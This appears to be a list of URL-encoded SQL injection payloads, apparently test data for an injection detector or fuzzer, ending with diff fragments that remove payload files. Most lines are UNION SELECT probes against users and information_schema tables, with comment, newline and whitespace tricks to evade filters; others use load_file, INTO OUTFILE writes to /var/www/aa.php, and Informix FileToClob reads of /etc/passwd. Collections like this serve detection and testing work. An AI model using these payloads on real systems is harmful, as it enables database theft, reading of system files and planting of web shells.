1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C
%28select%20substr%28login%0D%0A%29
%28select%20substr%28login%29
%28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
/%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
%27%20or%201%3D1%20or%20%27
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27union%20select%20us3rs%20from%20table1
%27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%40a1%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1
%27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
%27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%401%20union%20select%20us3rs%20from%20table1
%27-%401%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
-1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29
-1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
%27-%40a1%20union%20select%20us3rs%20from%20table1
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%23%0D%0A%0D%0Aunion
-1%23%0D%0A%0D%0Aunion%20%23
-1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23
-1%23%0D%0Aunion%20%23%0D%0A%23
-1%23union%20%23%0D%0Aunion
-1%23union%20%23%23%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0Aunion
#-1%23union%20%23%23%0D%0A---%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23--
-1%23union%20%23%23%0D%0A/1/%2A%2A/union%23--
-11/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union%23--
-1/1/%2A%2A/union%23--
1/1/%2A%2A/union%23--
-11/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union
-1%0D%0A/1/%2A%2A/union
-1%0D%0A/1/%2A%2A/union%23
-1%0D%0A/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union
1/1/%2A%2A/union
%0D%0A1/1/%2A%2A/union
0-%0D%0A1/1/%2A%2A/union
0x1-%0D%0A1/1/%2A%2A/union
0x1%20-%0D%0A1/1/%2A%2A/union
test%27-%0D%0A1/1/%2A%2A/union%20select
test%27-%0D%0A1/1/%2A%2A/union%28select
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
%27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
%27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
-1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
select%20load_file%28%27/asd/asd%27%29
select%20load_file%28%27/asd/asd%27%29
select%20load_file%28%27/asd/asd%27%29
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27%20into%20outfile%20%27/var/www/aa.php%27%23
%27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27
select%20load_file%28%27/asd/asd%27%29
1%20into%20outfile%20%27asd%27%0D%0A
1%20into%20outfile%20%27asd%27%0D%0A
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
1%20into%20outfile%20%27asd%27%0D%0A
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
1%20into%20outfile%20%27asd%27%0D%0A
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20into%20outfile%20%27asd%27%0D%0A
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27union%20select%20
%27union%20select
%22union%20select
1%20union%20select
%40a%20union%20select


@ -1,4 +0,0 @@
# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm
#
UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0
UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0


@ -1,20 +0,0 @@
# solar empire attack
# http://www.exploit-db.com/exploits/4078/
# these use the multiple insert syntax
